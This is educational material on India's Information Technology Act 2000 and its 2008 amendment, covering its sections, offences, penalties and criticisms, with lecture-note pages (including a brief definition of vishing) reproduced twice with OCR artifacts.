The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got the Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions -

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offenses and contraventions
4. Justice dispensation systems for cybercrimes

Offences -

Section | Offence | Punishment
65 | Tampering with computer source documents - Intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force | Imprisonment up to three years, or/and with fine up to 2 lakh rupees
66 | Hacking | Imprisonment up to three years, or/and with fine up to 5 lakh rupees
66-A | Sending offensive message through electronic means - Sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages | Imprisonment up to three years and with fine

Criticisms -

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some of the cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of Cyber Security.

Section 69 empowers the Central Government/State Government or its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption) under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


Page 56: Web technology and commerce unit 4

PREPARED BY ARUN PRATAP SINGH 55

55

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access

to private personal and financial information from the public for the purpose of financial reward

The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline

telephone services

Vishing is typically used to steal credit card numbers or other information used in identity theft

schemes from individuals

A rapidly growing online user base

121 Million Internet Users

65 Million Active Internet Users up by 28 from 51 million in 2010

50 Million users shop online on Ecommerce and Online Shopping Sites

46+ Million Social Network Users

346 million mobile users had subscribed to Data Packages

PREPARED BY ARUN PRATAP SINGH 56

56

CYBER LAW

(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or

Damage to the public or any person Destroys or Deletes or Alters any Information

Residing in a Computer Resource or diminishes its value or utility or affects it injuriously

by any means commits hack

(2) Whoever commits hacking shall be punished with imprisonment up to three years or with

fine which may extend up to two lakh rupees or with both

Whoever without permission of the owner of the computer

Secures Access

Downloads Copies or extracts any data computer database or any

information

Introduce or causes to be introduce any Virus or Contaminant

Disrupts or causes disruption

Denies or causes denial of access to any person

Provides any assistance to any person to facilitate access

Charges the services availed of by a person to the account of

another person by Tampering with or Manipulating any Computer

Computer System or Computer Network

Shall be liable to pay damages by way of compensation not exceeding one crore rupees

to the person so affected

Section ndash 43

Destroys Deletes or Alters any Information residing in a computer resource or diminishes its

value or utility or affects it injuriously by any means

Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any

computer source code used for a computer resource with an intention to cause damage

ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be

punishable with imprisonment for a term which may extend to two three years or with fine which

may extend to five lakh rupees or with bothrdquo [S66]

S66A - Punishment for sending offensive messages through communication service etc

Any person who sends by means of a computer resource or a communication device

Any information that is grossly offensive or has menacing character or

PREPARED BY ARUN PRATAP SINGH 57

57

Any information which he knows to be false but for the purpose of causing annoyance

inconvenience danger obstruction insult injury criminal intimidation enmity hatred or

ill will persistently makes by making use of such computer resource or a communication

device

Any electronic mail or electronic mail message for the purpose of causing annoyance or

inconvenience or to deceive or to mislead the addressee or recipient about the origin of

such messages

Shall be punishable with imprisonment for a term which may extend to three years and with

fine

S 66C - Punishment for identity theft

ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or

any other unique identification feature of any other person shall be punished with imprisonment

of either description for a term which may extend to three years and shall also be liable to fine

which may extend to rupees one lakhrdquo

S 66D - Punishment for cheating by personation by using computer resource

ldquoWhoever by means of any communication device or computer resource cheats by

personation shall be punished with imprisonment of either description for a term which may

extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo

S 66E - Punishment for violation of privacy

ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private

area of any person without his or her consent under circumstances violating the privacy of that

person shall be punished with imprisonment which may extend to three years or with fine not

exceeding two lakh rupees or with bothrdquo

S 67 A - Punishment for publishing or transmitting of material containing sexually

explicit act etc in electronic form

ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form

any material which contains sexually explicit act or conduct shall be punished on first conviction

with imprisonment of either description for a term which may extend to five years and with fine

which may extend to ten lakh rupeesrdquo

S 67 C - Preservation and Retention of information by intermediaries

ldquo(1) Intermediary shall preserve and retain such information as may be specified for such

duration and in such manner and format as the Central Government may prescribe

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section

(1) shall be punished with an imprisonment for a term which may extend to three years and shall

also be liable to finerdquo

PREPARED BY ARUN PRATAP SINGH 58

58

IT ACT

The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of

the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed

by Save Your Voice campaign and other civil society organizations in India User-review and

consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of

India to repeal and nullify parts of IT Act 2000

The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997

has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission

on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce

Following the UN Resolution India passed the Information Technology Act 2000 in May 2000

which came into force on October 17 2000 The Information Technology Act 2000 has been

substantially amended through the Information Technology (Amendment) Act 2008 which was

passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the

Presidential assent on February 5 2009 and came into force on October 27 2009 The amended

Act has provided additional focus on information security It has added several new sections on

offences including cyber terrorism and data protection A set of Rules related to sensitive personal

information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was

notified in April 2011

Provisions –

The Information Technology Act, 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act, 2000 addressed the following issues:

1. Legal recognition of electronic documents

2. Legal recognition of digital signatures

3. Offences and contraventions

4. Justice dispensation systems for cybercrimes

Offences –

Section 65 – Tampering with computer source documents: intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force. Punishment: imprisonment up to three years and/or fine up to 2 lakh rupees.

Section 66 – Hacking. Punishment: imprisonment up to three years and/or fine up to 5 lakh rupees.

Section 66-A – Sending offensive messages through electronic means: sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages. Punishment: imprisonment up to three years and with fine.

Criticisms –

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of cyber security.

Section 69 empowers the Central Government/State Government/its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption), under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.
